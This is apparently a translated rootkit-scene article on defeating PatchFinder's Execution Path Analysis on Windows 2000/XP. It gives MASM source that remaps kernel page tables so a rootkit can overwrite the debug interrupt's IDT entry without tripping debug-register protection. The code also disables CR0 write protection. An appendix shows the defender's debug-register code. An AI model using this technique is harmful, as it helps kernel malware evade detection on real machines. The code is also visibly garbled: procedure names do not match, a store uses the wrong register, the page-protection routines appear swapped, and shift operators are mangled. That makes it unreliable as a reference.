Attackers can bypass the Windows Rootkit detection system.

[Introduction]

PatchFinder is a well-designed program based on the EPA (Execution Path Analysis) technology to detect Rootkit that intrude into the kernel. Appendix 1 and 2 let you know how it works. This article provides a way to bypass the EPA.

[Method]

The EPA uses the 0x01 entry of the Interrupt Descriptor Table (IDT) based on the Intel processor's single-step mode. To prevent Rootkit from modifying this entry, it uses the debugging register (DR0, DR1) to protect the debugging handler (good idea ). The 0x1 entry is protected by the DR0 register, and the interrupt handler is protected by the DR1 register. (Note 1 :)
However, let's read the Inter Manual [3]: "Each debug Address Register (DR0 to DR3) saves the 32-bit breakpoint linear address ". Note: Linear address! In Windows 2000/XP, linear addresses are converted to physical addresses by paging. Assume that the base address of the IDT is 0x8003F400 and saved in IDTR, The 0x01 entry address of the IDT is 0x8003F408. Intel IDTR Description: "The base address indicates the 0x00 entry address of the IDT ." In WIndows 2000/XP, the page Directory directed by the Cr 3 register is mapped to the linear address 0xC0300000. Linear addresses are composed of directories, tables, and offsets. Through the paging mechanism, we convert 0x8003F408 to the physical address 0x03F00 (from the experiment ). Now we need to create a buffer, get the pointer to the buffer, and modify the page Directory and page table so that the buffer points to the physical address 0x03F00. Then, what is written to this buffer zone will be written into the IDT, and will not trigger the PatchFinder protection mechanism. Debugging registers cannot protect the memory at all because they cannot protect the physical memory.

[Source code]

The source code is compiled by MASM v8.0. Because I like the Assembly Language :-) full source code can be found at www.rootkit.com.

; --- Define the IDTR structure -------
Didtr struct; IDTR
DLIMIT WORD?
Ibase DWORD?
DIDTR ENDS
;-----------------------

ByepassIDTProtection PROC

LOCAL dbgHandler: DWORD

LOCAL myIDT: DIDTR

LOCAL idtbase: DWORD
LOCAL idtbaseoff: DWORD
LOCAL idtpvdf: DWORD
LOCAL idtPDEaddr: DWORD
LOCAL idtPTE: DWORD
LOCAL idtPTEaddr: DWORD

LOCAL varbase: DWORD
LOCAL varbaseoff: DWORD
LOCAL varpvdf: DWORD
LOCAL varPDEaddr: DWORD
LOCAL varPTE: DWORD
LOCAL varPTEaddr: DWORD

LOCAL diffoffset: DWORD

Pushad

; Allocate a page size of memory (allocated from non-Paging pool)
Invoke ExAllocatePool, NonPagedPoolMustSucceed, 01000 h
Mov varbase, eax

Cli; Remember to restore

Invoke DisablePageProtection; a very old technique for XP and Regmon

Sidt myIDT
Mov eax, myIDT. ibase
Add eax, 08 h
Mov idtbase, eax; idtbase = IDT base address + 8 bytes

And eax, 0FFC00000h; obtain the Directory Index of the IDT address
Shr eax, 22
Shl eax, 2; multiplication and 4

Mov ebx, 0C0300000h; 0C0300000 = page Directory
Add ebx, eax; ebx = [page Directory + Directory Index * 4]
Mov idtPDEaddr, ebx

Mov eax, [ebx]
Mov idtpvdf, eax; eax = page Directory Entry of IDT address (partial de)

Mov eax, idtbase
And eax, oFFFh; get the low 12-bit IDT address = page offset mov idtbaseoff, eax

Mov eax, idtbase
Shr eax, 12; get the 12-bit high IDT address
Shl eax, 2; multiplication and 4

Mov ebx, 0C0000000h; the process page table is mapped to 4 MB space starting with 0xC0000000
Add ebx, eax
Mov idtPTEaddr, eax; ID t address of the PTE address

Mov eax, [ebx]
Mov idtPTE, eax; obtain the PTE of this address

Mov eax, varbase

And eax, 0FFC00000h; get the page Directory Index of varbase
Shr eax, 22
Shl eax, 2

Mov ebx, 0C0300000h
Add ebx, eax
Mov varPDEaddr, ebx

Mov eax, [ebx]
Mov varpvdf, eax

Mov eax, varbase
And eax, 0 FFFh
Mov varbaseoff, eax

Mov eax, varbase
Shr eax, 12
Shl eax, 2

Mov ebx, 0C0000000h
Add ebx, eax
Mov varPTEaddr, ebx

Mov eax, [ebx]
Mov varPTE, eax

Mov eax, varPDEaddr; change the PDDE to be the same as IDT0x01
Mov ebx, idtpvdf
Mov [eax], ebx

Mov eax, varPTEaddr; change PTE to the same as IDT0x01
Mov ebx, idtPTE
Mov [eax], ebx

Mov ebx, idtbaseoff; correction page offset
Mov eax, varbaseoff
Sub ebx, eax

Now we can use a linear address to write something into the 0x01 descriptor of the IDT without triggering the debugging register.

Mov eax, varbase
Mov dword ptr [eax + ebx], 0 DEADBEEFh

Mov eax, varPDEaddr; restore the original value
Mov ebx, varpvdf
Mov [eax], ebx

Mov eax, varPTEaddr; restore the original value
Mov ebx, varPTE
Mov [eax], ebx

Invoke EnablePageProtection; resumes the WP flag of the CR0 register.

Sti

Popad
Ret

BypassIDTProtection ENDP
;::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::
EnablePageProtection PROC

Push eax
Mov eax, CR0
And eax, 0 FFFEFFFFh
Mov CR0, eax
Pop eax
Ret

EnablePageProtection ENDP
;::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::
DisablePageProtection PROC

Push eax
Mov eax, CR0
Or eax, NOT 0 FFFEFFFFh
Mov CR0, eax
Pop eax
Ret

DisablePageProtection ENDP
;::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::

[Future of Rootkit]

Unfortunately, this method makes EPA useless. If Microsoft does not change its security structure, there is no way to block rookits in the future. In the future, rootkit will play a major role in the paging mechanism, which has unlimited possibilities. Once the Ring 0 is entered, it will always be in the Ring 0.

[Reference]

[1] Joanna Rutkowska, Advanced Windows 2000 Rootkit Detection (Advanced Rootkit Detection Technology)
[2] Joanna Rutkowska, Detecting Windows Server Compromises with PatchFinder2
[3] IA32 Intel release eture Softwares Developers Manual, vol 1-3

Note 1:

This picture cannot be drawn, that is, the reader may not be able to understand it (because the painting is too simple -_-). Here I will add the principle of using the debug register to protect the address. First, the four Debug Registers of the DR0-DR4 store four linear addresses, then through the correlation bit of the DR7 register and check the correlation bit of the DR6 register to perform related operations on these four addresses. Refer to the following code:

# Define DB_PROT_EXEC 0
# Define DB_PROT_WRITE 1
# Define DB_PROT_RW 3

# Define DB_DR0 0
# Define DB_DR1
# Define DB_DR2
# Define DB_DR3

# Define DB_LEN_1B 0
# Define DB_LEN_2B 1
# Define DB_LEN_4B 3

Int dbProtect (int reg, int addr, int len, int protection ){
Unsigned int dr7mask;

Switch (reg ){
Case 0:
_ Asm {
Mov eax, addr;
Mov DR0, eax;
}
Break;
Case 1:
_ Asm {
Mov eax, addr;
Mov DR1, eax;
}
Break;
Case 2:
_ Asm {
Mov eax, addr;
Mov DR2, eax;
}
Break;
Case 3:
_ Asm {
Mov eax, addr;
Mov DR3, eax;
}
Break;
}

Dr7mask = 0x2 <(reg * 2 );
Dr7mask | = (len <2) + protection) <(16 + (4 * reg )));
_ Asm {
Mov eax, DR7;
Or eax, dr7mask;
Mov DR7, eax;
}

Return 1;
}

Int dbSetGeneralProtection (){

_ Asm {
Mov eax, DR7;
Or eax, 0x1000;
Mov DR7, eax;
}

Return 1;
}

Then add the following code to the interrupt handler:
Mov eax, DR6;
Test ax, 0x100f; // BD | B3 | B2 | B1 | B0
.
.
Mov eax, DR6; // check the BS (single step) bit of DR6
Test ah, 0x40;

Finally, we decided to protect the three addresses to different degrees:
DbProtect (DB_DR0, (int) getIntGateAddr (NT_DEBUG_INT), DB_LEN_4B, DB_PROT_WRITE );
DbProtect (DB_DR1, (int) getIntGateAddr (NT_DEBUG_INT) + 4, DB_LEN_4B, DB_PROT_WRITE );
DbProtect (DB_DR2, (int) NewDebugHandler1, DB_LEN_4B, DB_PROT_RW );

If you are not familiar with the functions of DR6 and DR7, check Intel's Manual Section 15.2 <Debug Registers>.